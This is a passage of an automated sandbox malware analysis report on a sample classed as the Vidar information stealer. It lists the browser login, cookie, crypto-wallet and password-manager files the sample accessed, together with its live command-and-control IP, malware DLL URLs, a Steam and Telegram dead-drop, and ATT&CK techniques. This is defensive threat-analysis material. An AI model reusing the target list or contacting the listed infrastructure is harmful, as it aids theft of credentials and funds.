Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
                      Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet3
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                      Source: Yara match File source: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match File source: 0.2.file.exe.3ec5570.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.file.exe.3ec5570.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7564, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C930C40 sqlite3_bind_zeroblob,3_2_6C930C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C930D60 sqlite3_bind_parameter_name,3_2_6C930D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C858EA0 sqlite3_clear_bindings,3_2_6C858EA0
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Software Packing | NTDS | 54 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 511 Process Injection | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      [Figure: Behavior Graph. ID: 1417473; Sample: file.exe; Startdate: 29/03/2024; Architecture: WINDOWS; Score: 100. The graph shows file.exe starting RegAsm.exe (two instances), WerFault.exe and conhost.exe, and RegAsm.exe contacting 78.46.229.36 (port 443, Germany) and steamcommunity.com (104.112.44.153, port 443, United States).]

Source | Detection | Scanner | Label | Link
file.exe | 29% | Virustotal | | Browse
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\freebl3.dll | 0% | Virustotal | | Browse
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | Virustotal | | Browse
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlm[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs | |
                      No Antivirus matches
                      No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.112.44.153 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://78.46.229.36/msvcp140.dll | true | Avira URL Cloud: malware | unknown
https://78.46.229.36/mozglue.dll | true | Avira URL Cloud: malware | unknown
https://78.46.229.36/ | true | 2%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://78.46.229.36/softokn3.dll | true | Avira URL Cloud: malware | unknown
https://78.46.229.36/freebl3.dll | true | Avira URL Cloud: malware | unknown
https://78.46.229.36/nss3.dll | true | Avira URL Cloud: malware | unknown
https://78.46.229.36/vcruntime140.dll | true | Avira URL Cloud: malware | unknown
https://78.46.229.36/sqlm.dll | true | 0%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199658817715 | false | | high
                                                                                                                                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                      high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                        high
                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                          high
                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallEGIDAAFI.3.drfalse
                                                                                                                                            high
                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchECFHIJKJ.3.drfalse
                                                                                                                                              high
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                high
                                                                                                                                                https://78.46.229.36/BRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                unknown
                                                                                                                                                https://78.46.229.36/DRegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://steamcommunity.com/workshop/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okCristinafile.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.sqlite.org/copyright.html.RegAsm.exe, 00000003.00000002.1982390660.0000000019EED000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199658817715[1].htm.3.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://78.46.229.36JEBKERegAsm.exe, 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              low
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoECFHIJKJ.3.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119965881771576561199658817715[1].htm.3.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
78.46.229.36 | unknown | Germany | 24940 | HETZNER-ASDE | true
104.112.44.153 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1417473
Start date and time: 2024-03-29 12:07:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/30@1/2
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          • Number of executed functions: 83
                                                                                                                                                                          • Number of non-executed functions: 206
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:07:55 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
12:07:58 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
78.46.229.36 | file.exe | malicious | Vidar
78.46.229.36 | BuThoFHNNK.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader
78.46.229.36 | 6uVlPQSJ4e.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader
78.46.229.36 | file.exe | malicious | Vidar
78.46.229.36 | i1crvbOZAP.exe | malicious | Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader
78.46.229.36 | yU3icg18lq.exe | malicious | Vidar
78.46.229.36 | EcNghZJd5O.exe | malicious | Vidar
78.46.229.36 | Rechnung.pdf.lnk | malicious | Vidar
78.46.229.36 | Esp.exe | malicious | Vidar
78.46.229.36 | file.exe | malicious | PureLog Stealer, Vidar
104.112.44.153 | file.exe | malicious | Vidar
104.112.44.153 | 1x43xx.exe | malicious | Unknown
104.112.44.153 | wlUQUBDNsV.exe | malicious | RisePro Stealer
104.112.44.153 | 3Q6szo2XZ9.exe | malicious | Unknown
104.112.44.153 | qyNqgJ8r1I.exe | malicious | Unknown
104.112.44.153 | file.exe | malicious | RisePro Stealer
Match | Associated Sample Name / URL | Detection | Threat Name | Context
steamcommunity.com | file.exe | malicious | Vidar | 104.105.90.131
steamcommunity.com | BuThoFHNNK.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | 104.71.182.190
steamcommunity.com | 6uVlPQSJ4e.exe | malicious | LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader | 104.105.90.131
steamcommunity.com | file.exe | malicious | Vidar | 104.102.129.112
steamcommunity.com | i1crvbOZAP.exe | malicious | Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader | 23.47.27.74
steamcommunity.com | yU3icg18lq.exe | malicious | Vidar | 23.47.27.74
steamcommunity.com | EcNghZJd5O.exe | malicious | Vidar | 104.102.129.112
steamcommunity.com | Rechnung.pdf.lnk | malicious | Vidar | 104.105.90.131
steamcommunity.com | Esp.exe | malicious | Vidar | 104.102.129.112
                                                                                                                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          AKAMAI-ASUShttps://depl.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 23.43.243.35
                                                                                                                                                                                                          https://attwebupdate.w3spaces.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.43.243.137
                                                                                                                                                                                                          https://mysteryclickm.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.67.9.123
                                                                                                                                                                                                          Facture_160087511.htmlGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                          • 23.52.162.98
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          https://ckydb04.na1.hubspotlinks.com/Ctc/OP+113/cKydB04/VW9bQw4skpv3N4QMDhk6pMpJW5g6HvJ5ccjQdN61zzVd3qn9gW7lCdLW6lZ3m-VBhZqP2fNwFyN40GRrrMQlZ-N2TdQmJ13Y6QW10XVPX3kbMHcN4L237-7KHZ5W1zLF7f8GbdtBW2ZKqmb4N84ZcW3QDpzS6S7KJJW5X7x_l7b4v9TW2F362D3Hh1s9W54lklM4T0vLxN7h7S8FNlcHjW20Y8Mn2bFBzVW9hqyrD48FY07W1SGLwZ5DF_9-W40HntB7qL0THW1mF8BY3vVj3gW2n5NX74XPrGTW45qZ3V6l-BrTN7CsbcvdfdyCW5951f94y1-HGN8ZFSwmVlSf3W5fSXSN3-n9KQW8hNdv46-Q6rkf7QDZST04Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.105.46.200
                                                                                                                                                                                                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 104.71.182.190
                                                                                                                                                                                                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                                                          p8F35SRiO8.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 23.192.2.176
                                                                                                                                                                                                          Kie7OQsnAC.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 23.74.215.167
                                                                                                                                                                                                          HETZNER-ASDEInjectToolInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                          • 5.161.74.235
                                                                                                                                                                                                          MXpl6HFisn.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                                                                                                          • 95.216.41.236
                                                                                                                                                                                                          Mcb5K3TOWT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 144.76.170.20
                                                                                                                                                                                                          getscreen-728974364.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 5.75.168.191
                                                                                                                                                                                                          getscreen-728974364.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 5.75.168.191
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          JAJL2EYBPH.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 138.201.79.103
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          BuThoFHNNK.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
                                                                                                                                                                                                          6uVlPQSJ4e.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                          • 78.46.229.36
